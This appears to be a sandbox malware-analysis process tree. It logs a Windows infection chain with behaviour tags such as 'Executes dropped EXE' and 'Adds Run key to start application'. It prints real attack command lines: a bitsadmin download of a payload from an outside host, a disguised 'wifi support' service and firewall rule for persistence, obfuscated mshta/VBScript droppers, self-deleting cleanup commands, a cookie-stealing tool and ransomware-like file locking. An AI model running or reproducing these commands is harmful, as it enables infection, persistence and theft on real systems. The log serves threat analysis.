C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
PID:2500 -
C:\Windows\SysWOW64\rUNdlL32.eXe"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl8⤵PID:5764
-
-
-
-
C:\Users\Admin\Documents\VLTUrZtw2dcC7WCHvQnooQgO.exe"C:\Users\Admin\Documents\VLTUrZtw2dcC7WCHvQnooQgO.exe"6⤵
- Executes dropped EXE
PID:4360 -
C:\Users\Admin\Documents\VLTUrZtw2dcC7WCHvQnooQgO.exe"C:\Users\Admin\Documents\VLTUrZtw2dcC7WCHvQnooQgO.exe"7⤵
- Executes dropped EXE
PID:4368 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 12688⤵
- Program crash
PID:5616
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 8167⤵
- Program crash
PID:3032
-
-
-
C:\Users\Admin\Documents\UY_2GTcIfYY5g4By6LEO0bes.exe"C:\Users\Admin\Documents\UY_2GTcIfYY5g4By6LEO0bes.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4044 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 8967⤵
- Program crash
PID:1796
-
-
-
C:\Users\Admin\Documents\tGb3YwXovxcTQXloY7p_M8QX.exe"C:\Users\Admin\Documents\tGb3YwXovxcTQXloY7p_M8QX.exe"6⤵
- Executes dropped EXE
PID:4188 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 6607⤵
- Program crash
PID:1108
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 6767⤵
- Program crash
PID:5828
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 7287⤵
- Program crash
PID:4156
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 7767⤵
- Program crash
PID:5856
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 10167⤵
- Program crash
PID:5804
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 12407⤵
- Program crash
PID:304
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 12527⤵
- Program crash
PID:4868
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 14247⤵
- Program crash
PID:5188
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 14167⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5400
-
-
-
C:\Users\Admin\Documents\JKT8aecd_mABUFT2yA_MY8he.exe"C:\Users\Admin\Documents\JKT8aecd_mABUFT2yA_MY8he.exe"6⤵
- Executes dropped EXE
PID:1336 -
C:\Users\Admin\Documents\JKT8aecd_mABUFT2yA_MY8he.exe"C:\Users\Admin\Documents\JKT8aecd_mABUFT2yA_MY8he.exe" -a7⤵
- Executes dropped EXE
PID:5124
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_7.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Users\Admin\AppData\Local\Temp\7zS44ACA364\arnatic_7.exearnatic_7.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:200 -
C:\Users\Admin\AppData\Local\Temp\7zS44ACA364\arnatic_7.exeC:\Users\Admin\AppData\Local\Temp\7zS44ACA364\arnatic_7.exe6⤵
- Executes dropped EXE
PID:940
-
-
-
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
PID:2628
-
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:5184 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
PID:5432
-
-
C:\Users\Admin\AppData\Local\Temp\F9DD.exeC:\Users\Admin\AppData\Local\Temp\F9DD.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:4320 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im F9DD.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\F9DD.exe" & del C:\ProgramData\*.dll & exit2⤵PID:5072
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Loads dropped DLL
PID:5764
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im F9DD.exe /f3⤵
- Kills process with taskkill
PID:5856
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:1504
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5972
-
C:\Windows\System32\slui.exeC:\Windows\System32\slui.exe -Embedding1⤵
- Executes dropped EXE
PID:1900
-
C:\Users\Admin\AppData\Local\Temp\3193.exeC:\Users\Admin\AppData\Local\Temp\3193.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5484
-
C:\Users\Admin\AppData\Local\Temp\3359.exeC:\Users\Admin\AppData\Local\Temp\3359.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4328
-
C:\Users\Admin\AppData\Local\Temp\8F06.exeC:\Users\Admin\AppData\Local\Temp\8F06.exe1⤵PID:2892
-
C:\Users\Admin\AppData\Local\Temp\912A.exeC:\Users\Admin\AppData\Local\Temp\912A.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4232
-
C:\Users\Admin\AppData\Local\Temp\94E4.exeC:\Users\Admin\AppData\Local\Temp\94E4.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5016
-
C:\Users\Admin\AppData\Local\Temp\9979.exeC:\Users\Admin\AppData\Local\Temp\9979.exe1⤵
- Executes dropped EXE
PID:5248 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Nel.tmp2⤵PID:5836
-
C:\Windows\SysWOW64\cmd.execmd3⤵PID:3972
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^CveySoEZqqMrsTFaYBongFlRQEfexsadHXQIISdfxuJJyCkEiLUlCPbXklghSBFIIcvzeWKylTriVBLgzKUIvoNRATvbEevTBwqJuRBlwPqJMfwJmqUiGWkAHESpAjAivp$" Sofferenza.tmp4⤵PID:5868
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 304⤵
- Runs ping.exe
PID:5376
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Convertira.exe.comConvertira.exe.com i4⤵
- Executes dropped EXE
PID:4464 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Convertira.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Convertira.exe.com i5⤵PID:4644
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Convertira.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Convertira.exe.com i6⤵
- Drops startup file
- Suspicious use of SetThreadContext
PID:3908 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe7⤵PID:5592
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\9EBA.exeC:\Users\Admin\AppData\Local\Temp\9EBA.exe1⤵
- Executes dropped EXE
PID:4956
-
C:\Users\Admin\AppData\Local\Temp\A207.exeC:\Users\Admin\AppData\Local\Temp\A207.exe1⤵PID:5516
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:188
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4408
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3404
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:5848
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4264
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:1696
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5860
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:4272
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4788
-
C:\Users\Admin\AppData\Local\Temp\FB15.exeC:\Users\Admin\AppData\Local\Temp\FB15.exe1⤵PID:4164
-
C:\Users\Admin\AppData\Local\Temp\FB15.exeC:\Users\Admin\AppData\Local\Temp\FB15.exe2⤵
- Adds Run key to start application
PID:5616 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
- Modifies data under HKEY_USERS
PID:4368
-
-
C:\Users\Admin\AppData\Local\Temp\FB15.exe"C:\Users\Admin\AppData\Local\Temp\FB15.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:3508
-
C:\Users\Admin\AppData\Local\Temp\FB15.exe"C:\Users\Admin\AppData\Local\Temp\FB15.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Modifies extensions of user files
PID:4868 -
C:\Users\Admin\AppData\Local\0fde0ab8-7377-40f2-a605-a8c872e4954d\build2.exe"C:\Users\Admin\AppData\Local\0fde0ab8-7377-40f2-a605-a8c872e4954d\build2.exe"5⤵
- Suspicious use of SetThreadContext
PID:5840 -
C:\Users\Admin\AppData\Local\0fde0ab8-7377-40f2-a605-a8c872e4954d\build2.exe"C:\Users\Admin\AppData\Local\0fde0ab8-7377-40f2-a605-a8c872e4954d\build2.exe"6⤵PID:5188
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\0fde0ab8-7377-40f2-a605-a8c872e4954d\build2.exe" & del C:\ProgramData\*.dll & exit7⤵PID:4228
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
PID:4444
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:5288
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\8B2.exeC:\Users\Admin\AppData\Local\Temp\8B2.exe1⤵
- Checks whether UAC is enabled
PID:2228
-
C:\Users\Admin\AppData\Local\Temp\A97.exeC:\Users\Admin\AppData\Local\Temp\A97.exe1⤵PID:2308
-
C:\Users\Admin\AppData\Local\Temp\is-GLKPM.tmp\A97.tmp"C:\Users\Admin\AppData\Local\Temp\is-GLKPM.tmp\A97.tmp" /SL5="$D00F4,172303,88576,C:\Users\Admin\AppData\Local\Temp\A97.exe"2⤵
- Loads dropped DLL
PID:644 -
C:\Users\Admin\AppData\Local\Temp\is-DAD0S.tmp\èeèrgegdè_éçè_)))_.exe"C:\Users\Admin\AppData\Local\Temp\is-DAD0S.tmp\èeèrgegdè_éçè_)))_.exe" /S /UID=rec73⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:3032 -
C:\Program Files\Windows NT\ENRUHKUANA\irecord.exe"C:\Program Files\Windows NT\ENRUHKUANA\irecord.exe" /VERYSILENT4⤵PID:620
-
C:\Users\Admin\AppData\Local\Temp\is-8RH2S.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-8RH2S.tmp\irecord.tmp" /SL5="$30334,5808768,66560,C:\Program Files\Windows NT\ENRUHKUANA\irecord.exe" /VERYSILENT5⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:1784 -
C:\Program Files (x86)\i-record\I-Record.exe"C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu6⤵
- Loads dropped DLL
PID:5776
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\93-268fe-ea0-9acbe-86e421eaa85d1\Regekuvuqi.exe"C:\Users\Admin\AppData\Local\Temp\93-268fe-ea0-9acbe-86e421eaa85d1\Regekuvuqi.exe"4⤵
- Checks computer location settings
PID:3932
-
-
C:\Users\Admin\AppData\Local\Temp\ed-0ad35-f4f-1089b-0b5cf5c0272cf\Guvejocolu.exe"C:\Users\Admin\AppData\Local\Temp\ed-0ad35-f4f-1089b-0b5cf5c0272cf\Guvejocolu.exe"4⤵PID:3044
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nznf1rmw.xk2\GcleanerEU.exe /eufive & exit5⤵PID:5428
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t0lofgsl.ggp\installer.exe /qn CAMPAIGN="654" & exit5⤵PID:5068
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sczavsen.50d\Setup3310.exe /Verysilent /subid=623 & exit5⤵PID:5988
-
C:\Users\Admin\AppData\Local\Temp\sczavsen.50d\Setup3310.exeC:\Users\Admin\AppData\Local\Temp\sczavsen.50d\Setup3310.exe /Verysilent /subid=6236⤵PID:5208
-
C:\Users\Admin\AppData\Local\Temp\is-K408C.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-K408C.tmp\Setup3310.tmp" /SL5="$103CE,138429,56832,C:\Users\Admin\AppData\Local\Temp\sczavsen.50d\Setup3310.exe" /Verysilent /subid=6237⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4392 -
C:\Users\Admin\AppData\Local\Temp\is-CLSUJ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-CLSUJ.tmp\Setup.exe" /Verysilent8⤵PID:3972
-
C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"9⤵PID:1656
-
-
C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"9⤵
- Loads dropped DLL
- Checks processor information in registry
PID:5188 -
C:\Users\Admin\AppData\Local\Temp\LabPicV3.exe"C:\Users\Admin\AppData\Local\Temp\LabPicV3.exe" end10⤵PID:2088
-
-
-
C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"9⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:5540
-
-
C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"9⤵
- Checks computer location settings
PID:5456 -
C:\Windows\SysWOW64\rUNdlL32.eXe"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl10⤵
- Loads dropped DLL
- Modifies registry class
PID:6876
-
-
-
C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"9⤵PID:660
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵PID:5960
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵PID:6608
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵PID:6988
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵PID:6116
-
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\smwrcgd2.shw\google-game.exe & exit5⤵PID:2800
-
C:\Users\Admin\AppData\Local\Temp\smwrcgd2.shw\google-game.exeC:\Users\Admin\AppData\Local\Temp\smwrcgd2.shw\google-game.exe6⤵PID:5764
-
C:\Users\Admin\AppData\Local\Temp\smwrcgd2.shw\google-game.exe"C:\Users\Admin\AppData\Local\Temp\smwrcgd2.shw\google-game.exe" -a7⤵PID:5788
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\no3u5luw.k5q\toolspab1.exe & exit5⤵PID:6004
-
C:\Users\Admin\AppData\Local\Temp\no3u5luw.k5q\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\no3u5luw.k5q\toolspab1.exe6⤵
- Suspicious use of SetThreadContext
PID:4480 -
C:\Users\Admin\AppData\Local\Temp\no3u5luw.k5q\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\no3u5luw.k5q\toolspab1.exe7⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2088
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kgowshn0.biu\SunLabsPlayer.exe /S & exit5⤵PID:6828
-
C:\Users\Admin\AppData\Local\Temp\kgowshn0.biu\SunLabsPlayer.exeC:\Users\Admin\AppData\Local\Temp\kgowshn0.biu\SunLabsPlayer.exe /S6⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:6776 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCD90.tmp\tempfile.ps1"7⤵PID:6512
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCD90.tmp\tempfile.ps1"7⤵PID:5328
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCD90.tmp\tempfile.ps1"7⤵PID:5528
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:5764
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCD90.tmp\tempfile.ps1"7⤵PID:3936
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4820
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCD90.tmp\tempfile.ps1"7⤵PID:6572
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCD90.tmp\tempfile.ps1"7⤵PID:5564
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCD90.tmp\tempfile.ps1"7⤵
- Checks for any installed AV software in registry
PID:500
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z7⤵
- Download via BitsAdmin
PID:1924
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"7⤵
- Drops file in Program Files directory
PID:2464
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"7⤵PID:3444
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCD90.tmp\tempfile.ps1"7⤵PID:2312
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCD90.tmp\tempfile.ps1"7⤵PID:5212
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCD90.tmp\tempfile.ps1"7⤵PID:3408
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCD90.tmp\tempfile.ps1"7⤵PID:4964
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCD90.tmp\tempfile.ps1"7⤵PID:5316
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx7⤵PID:4512
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx8⤵
- Drops file in System32 directory
PID:1728
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCD90.tmp\tempfile.ps1"7⤵
- Drops file in Program Files directory
PID:6660
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCD90.tmp\tempfile.ps1"7⤵PID:1600
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCD90.tmp\tempfile.ps1"7⤵
- Drops file in Program Files directory
PID:2032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCD90.tmp\tempfile.ps1"7⤵PID:3712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCD90.tmp\tempfile.ps1"7⤵PID:4572
-
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT7⤵PID:5220
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1k3jcvl1.ppo\GcleanerWW.exe /mixone & exit5⤵PID:6820
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1631.exeC:\Users\Admin\AppData\Local\Temp\1631.exe1⤵PID:4160
-
C:\Users\Admin\AppData\Local\Temp\1631.exe"C:\Users\Admin\AppData\Local\Temp\1631.exe"2⤵
- Modifies data under HKEY_USERS
PID:5136 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5136 -s 12323⤵
- Program crash
PID:6888
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 5442⤵
- Program crash
PID:356
-
-
C:\Users\Admin\AppData\Local\Temp\1911.exeC:\Users\Admin\AppData\Local\Temp\1911.exe1⤵PID:5672
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\gmvupske\2⤵PID:5012
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\lakgljeh.exe" C:\Windows\SysWOW64\gmvupske\2⤵PID:4744
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create gmvupske binPath= "C:\Windows\SysWOW64\gmvupske\lakgljeh.exe /d\"C:\Users\Admin\AppData\Local\Temp\1911.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:3348
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description gmvupske "wifi internet conection"2⤵PID:2508
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start gmvupske2⤵PID:4820
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:4416
-
-
C:\Users\Admin\AppData\Local\Temp\1C3E.exeC:\Users\Admin\AppData\Local\Temp\1C3E.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:5516 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 1C3E.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1C3E.exe" & del C:\ProgramData\*.dll & exit2⤵PID:3652
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 1C3E.exe /f3⤵
- Suspicious use of SetThreadContext
- Kills process with taskkill
PID:4164
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Delays execution with timeout.exe
PID:2892
-
-
-
C:\Users\Admin\AppData\Local\Temp\216F.exeC:\Users\Admin\AppData\Local\Temp\216F.exe1⤵PID:5232
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCriPt:ClOSE(cREAteObjecT("wscrIPt.sHeLL" ). rUN ("C:\Windows\system32\cmd.exe /q/C cOpy /y ""C:\Users\Admin\AppData\Local\Temp\216F.exe"" ..\qXK~CwG.exe&& START ..\QxK~CWG.EXe -PR0oRU_ZO88aZ9ZaPNxDj_e0zJ2xs & if """" == """" for %u iN (""C:\Users\Admin\AppData\Local\Temp\216F.exe"") do taskkill -F -IM ""%~Nxu"" " ,0, trUE))2⤵PID:4444
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q/C cOpy /y "C:\Users\Admin\AppData\Local\Temp\216F.exe" ..\qXK~CwG.exe&& START ..\QxK~CWG.EXe -PR0oRU_ZO88aZ9ZaPNxDj_e0zJ2xs & if ""== "" for %u iN ("C:\Users\Admin\AppData\Local\Temp\216F.exe") do taskkill -F -IM "%~Nxu"3⤵PID:6108
-
C:\Users\Admin\AppData\Local\Temp\qXK~CwG.exe..\QxK~CWG.EXe -PR0oRU_ZO88aZ9ZaPNxDj_e0zJ2xs4⤵
- Suspicious use of SetThreadContext
PID:3508 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCriPt:ClOSE(cREAteObjecT("wscrIPt.sHeLL" ). rUN ("C:\Windows\system32\cmd.exe /q/C cOpy /y ""C:\Users\Admin\AppData\Local\Temp\qXK~CwG.exe"" ..\qXK~CwG.exe&& START ..\QxK~CWG.EXe -PR0oRU_ZO88aZ9ZaPNxDj_e0zJ2xs & if ""-PR0oRU_ZO88aZ9ZaPNxDj_e0zJ2xs "" == """" for %u iN (""C:\Users\Admin\AppData\Local\Temp\qXK~CwG.exe"") do taskkill -F -IM ""%~Nxu"" " ,0, trUE))5⤵PID:1436
-
